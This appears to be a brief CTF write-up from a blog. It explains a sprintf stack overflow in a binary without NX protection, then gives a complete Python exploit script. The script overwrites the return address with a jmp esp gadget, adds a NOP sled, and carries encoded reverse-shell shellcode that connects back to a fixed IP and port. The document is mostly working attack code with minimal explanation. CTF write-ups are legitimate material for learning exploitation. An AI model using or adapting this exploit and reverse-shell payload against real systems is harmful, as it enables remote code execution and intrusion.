Vulnerability occurs when binary gets 0x1FFF size of input from user then copys to buffer by sprintf which makes us capable of manipulating the return address
Binary had no NX and luckily there was jmp esp gadget which we can use it to execute our shellcode.
#!/usr/bin/python from socket import * from struct import pack from time import sleep p = lambda x : pack("<L", x) jmpesp = p(0x80488b0) #linux/x86/shell_reverse_tcp LHOST : 192.168.161.129 LPORT : 4321 shellcode = "" shellcode += "\xba\xe8\xd3\x61\xde\xda\xc6\xd9\x74\x24\xf4\x5f\x33\xc9" shellcode += "\xb1\x12\x31\x57\x12\x83\xc7\x04\x03\xbf\xdd\x83\x2b\x0e" shellcode += "\x39\xb4\x37\x23\xfe\x68\xd2\xc1\x89\x6e\x92\xa3\x44\xf0" shellcode += "\x40\x72\xe7\xce\xab\x04\x4e\x48\xcd\x6c\x91\x02\x8c\xed" shellcode += "\x79\x51\xcf\xfd\x98\xdc\x2e\x4d\x3c\x8f\xe1\xfe\x72\x2c" shellcode += "\x8b\xe1\xb8\xb3\xd9\x89\x6d\x9b\xae\x21\x1a\xcc\x32\xd8" shellcode += "\xb4\x9b\x50\x48\x1a\x15\x77\xdc\x97\xe8\xf8" payload ="echo " payload +="\x41"*0x76 payload +=jmpesp payload +="\x90"*50 payload +=shellcode s = socket(AF_INET, SOCK_STREAM) s.connect(("localhost", 9000)) print s.recv(1024) s.send(payload) s.close() |
'General News > Write-Ups' 카테고리의 다른 글
| HackIM nullcon exploitation400 (0) | 2015.01.11 |
|---|---|
| HackIM nullcon exploitation300 (0) | 2015.01.11 |
| ChristmasCTF ALGO200 (0) | 2014.12.26 |
| CSAW CTF 2014 Pybabies (0) | 2014.09.26 |
| codegate 2013 vuln200 - exploit only (0) | 2014.02.14 |